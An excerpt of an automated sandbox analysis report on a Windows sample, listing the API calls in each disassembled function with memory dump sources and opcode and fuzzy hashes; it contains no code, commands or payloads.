                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                        • Opcode ID: 9b1436838830e342c53a4da7d60051b8f90e9740b599f91b200e02dad69cba9f
                                                                                                                        • Instruction ID: 51c72a8940ab367fd409cafff8329f9eb08fb98036b20d879160f1f31c309eef
                                                                                                                        • Opcode Fuzzy Hash: 9b1436838830e342c53a4da7d60051b8f90e9740b599f91b200e02dad69cba9f
                                                                                                                        • Instruction Fuzzy Hash: 2821CDB6544208BFEB11EF669C84EBFB6FCEB88B98F10402AF505E6140EA64DD058775
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E0454E
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • _memset.LIBCMT ref: 00D93965
                                                                                                                        • _wcscpy.LIBCMT ref: 00D939B5
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D939C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                        • String ID: Line:
                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                        • Opcode ID: cdbbddac79696e5335e96dfd6e3e91b78f82708f23256a0622c3f97d370649ea
                                                                                                                        • Instruction ID: 6ad29675cd540387218e52eade51d7bf51013223b7dc8411e2a79c5d87e40c0c
                                                                                                                        • Opcode Fuzzy Hash: cdbbddac79696e5335e96dfd6e3e91b78f82708f23256a0622c3f97d370649ea
                                                                                                                        • Instruction Fuzzy Hash: 2B31B371408340BFDB25EB61DC45BDBB7E8EB44315F00495AF695A21A1DB709B4CCBB2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
                                                                                                                          • Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
                                                                                                                          • Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DF8F69
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00DF8F70
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DF8F85
                                                                                                                        • DestroyWindow.USER32(?), ref: 00DF8F8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                        • Opcode ID: 92c3d4eca2f2caf872d1af4d0d94e9915c688635e2e873ea7276df1b426a499a
                                                                                                                        • Instruction ID: a239c0079dbacfc1235c6262305903bdf06e71067afc2edeaaa3ff912e886bd3
                                                                                                                        • Opcode Fuzzy Hash: 92c3d4eca2f2caf872d1af4d0d94e9915c688635e2e873ea7276df1b426a499a
                                                                                                                        • Instruction Fuzzy Hash: C1219D71204209AFEF104E64DC80EBB77AAEF49368F168628FB54A7190CB71DC50A772
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00DDE392
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00DDE3E6
                                                                                                                        • __swprintf.LIBCMT ref: 00DDE3FF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E2DBF0), ref: 00DDE43D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                        • Opcode ID: 5f8ca6e474e4fc52991811db8a4c8351ad3ea8d15295fd8ef84b3745c9e8358f
                                                                                                                        • Instruction ID: 0478c6506ecd93bd3fd3b846c7b16803f352889afe69174bddd8a1e24159745b
                                                                                                                        • Opcode Fuzzy Hash: 5f8ca6e474e4fc52991811db8a4c8351ad3ea8d15295fd8ef84b3745c9e8358f
                                                                                                                        • Instruction Fuzzy Hash: 33214F35A40208AFCB10EFA5DC85DEEB7B8EF59714B108069F509EB251D631DA05CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                          • Part of subcall function 00DCD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DCD640
                                                                                                                          • Part of subcall function 00DCD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCD653
                                                                                                                          • Part of subcall function 00DCD623: GetCurrentThreadId.KERNEL32 ref: 00DCD65A
                                                                                                                          • Part of subcall function 00DCD623: AttachThreadInput.USER32(00000000), ref: 00DCD661
                                                                                                                        • GetFocus.USER32 ref: 00DCD7FB
                                                                                                                          • Part of subcall function 00DCD66C: GetParent.USER32(?), ref: 00DCD67A
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00DCD844
                                                                                                                        • EnumChildWindows.USER32(?,00DCD8BA), ref: 00DCD86C
                                                                                                                        • __swprintf.LIBCMT ref: 00DCD886
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                        • Opcode ID: 46567f7d24b2e19587c40e1e295060c25d872a31f79f0b6882a6a245b3d1abdc
                                                                                                                        • Instruction ID: 05f11647f0d1b9850233c35b7d5cbfeaedd134fd026d0131b5f31d22fcdd9500
                                                                                                                        • Opcode Fuzzy Hash: 46567f7d24b2e19587c40e1e295060c25d872a31f79f0b6882a6a245b3d1abdc
                                                                                                                        • Instruction Fuzzy Hash: 8811847154420A6BDF127F909C85FEA376AEF44704F0080BDBE0DAB186DB745945DB70
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DF18E4
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DF1917
                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DF1A3A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DF1AB0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2364364464-0
                                                                                                                        • Opcode ID: 4f88c1400b3b74c229354644f47ab612c494ba21c8ff88cb058297a3ab8fc153
                                                                                                                        • Instruction ID: 447a997139b972472fed05ca1fc807375e1d1594f617198da591e87fbddfa85a
                                                                                                                        • Opcode Fuzzy Hash: 4f88c1400b3b74c229354644f47ab612c494ba21c8ff88cb058297a3ab8fc153
                                                                                                                        • Instruction Fuzzy Hash: EF817C74A40204EBDF109F65C886BADBBE5EF49720F09C459F905AF382D7B4E9458BB0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DF05DF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00DF066E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF068C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00DF06D2
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00DF06EC
                                                                                                                          • Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
                                                                                                                          • Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327935632-0
                                                                                                                        • Opcode ID: 42eec7da8c6cc9af7b2a095c8823755be6cd7541d80fa99e2d4c400fd74d48a7
                                                                                                                        • Instruction ID: fc00a1a3214c18ba991b8e3fd9d01904faf1bbdbb3aee7b3032478ef9023fe63
                                                                                                                        • Opcode Fuzzy Hash: 42eec7da8c6cc9af7b2a095c8823755be6cd7541d80fa99e2d4c400fd74d48a7
                                                                                                                        • Instruction Fuzzy Hash: E9513A75A002099FCF00EFA8C9949ADBBB5EF49310B19C0A5EA55AB352DB30ED45CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                          • Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2DE0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF2E1F
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DF2E66
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00DF2E92
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00DF2E9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3440857362-0
                                                                                                                        • Opcode ID: 342d11540c5e5c8c3087a5eca9ddda2329ef47402168e73c6d4547eae8ce4706
                                                                                                                        • Instruction ID: 272344f6ec6e0774d824d9f3929ecb323004c66a1de093f9a1fa4c06309c3218
                                                                                                                        • Opcode Fuzzy Hash: 342d11540c5e5c8c3087a5eca9ddda2329ef47402168e73c6d4547eae8ce4706
                                                                                                                        • Instruction Fuzzy Hash: 1A514C71218209AFCB04EF64CC81E7AB7E9FF88314F14891DF695972A1DB31E905CB62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 533b7fc68e3cc664aad8b9db10da27e3016e6412d86f7a2b4b252d1cbaf17325
                                                                                                                        • Instruction ID: 205d859f32de851054d3fd31ecd9109305f998cf08994d97251499b8619ec877
                                                                                                                        • Opcode Fuzzy Hash: 533b7fc68e3cc664aad8b9db10da27e3016e6412d86f7a2b4b252d1cbaf17325
                                                                                                                        • Instruction Fuzzy Hash: 0F41023991020CAFD724DF28CE49FF9BB69EB09320F1AD251EA59E72D0C7309D24D660
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE17D4
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00DE17FD
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE183C
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE1861
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE1869
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1389676194-0
                                                                                                                        • Opcode ID: b0ed5048de812755bd9ed5f23ee480c2edb559a1ad5c5899c40a3b4f39974446
                                                                                                                        • Instruction ID: 4ee087c57823d640f023bfb02915ff8668526ff79f5fb08f5649391babf02682
                                                                                                                        • Opcode Fuzzy Hash: b0ed5048de812755bd9ed5f23ee480c2edb559a1ad5c5899c40a3b4f39974446
                                                                                                                        • Instruction Fuzzy Hash: F241F735A00205EFCF11EF65C981AADBBF5EF49314B148099E80AAB362DB31ED51DB70
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 00DAB749
                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00DAB799
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: debabc2a45594ecc393c016abaff58b00f096df1bbfdeb2b52b6f263f7183178
                                                                                                                        • Instruction ID: 2fd130b8cce1c263d5cb24744282afecd8287cd80771b13387fefe92d8ff67f0
                                                                                                                        • Opcode Fuzzy Hash: debabc2a45594ecc393c016abaff58b00f096df1bbfdeb2b52b6f263f7183178
                                                                                                                        • Instruction Fuzzy Hash: C7418E31504219FFDF159F64C844AEABBB4FB46364F10822AF829A22D1C730AD95DFA1
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00DCC156
                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00DCC200
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00DCC208
                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00DCC216
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00DCC21E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: f1b7bb0cc86914fdeb11409d7a58eae307cdc65ad24442f239bbfe8b6bbd3221
                                                                                                                        • Instruction ID: 3706c71a503f79d23267960ed63edc7a38bee0a30fbd2de384d287824e2a24c5
                                                                                                                        • Opcode Fuzzy Hash: f1b7bb0cc86914fdeb11409d7a58eae307cdc65ad24442f239bbfe8b6bbd3221
                                                                                                                        • Instruction Fuzzy Hash: 6F31C07190021AEFDB04CFA9DD4CBDE3BB5EB04325F144218F925AB1D1C7B09904CBA0
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00DCE9CD
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DCE9EA
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DCEA22
                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DCEA48
                                                                                                                        • _wcsstr.LIBCMT ref: 00DCEA52
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902887630-0
                                                                                                                        • Opcode ID: bff018c556d8da1bd0990872aef712171e445b4511202bb1e9de2ab1e0a5a5ca
                                                                                                                        • Instruction ID: a4f0642b3fe3342144e7765adac9878154201ba8cd5d0befa4a4cd0daa5a8da6
                                                                                                                        • Opcode Fuzzy Hash: bff018c556d8da1bd0990872aef712171e445b4511202bb1e9de2ab1e0a5a5ca
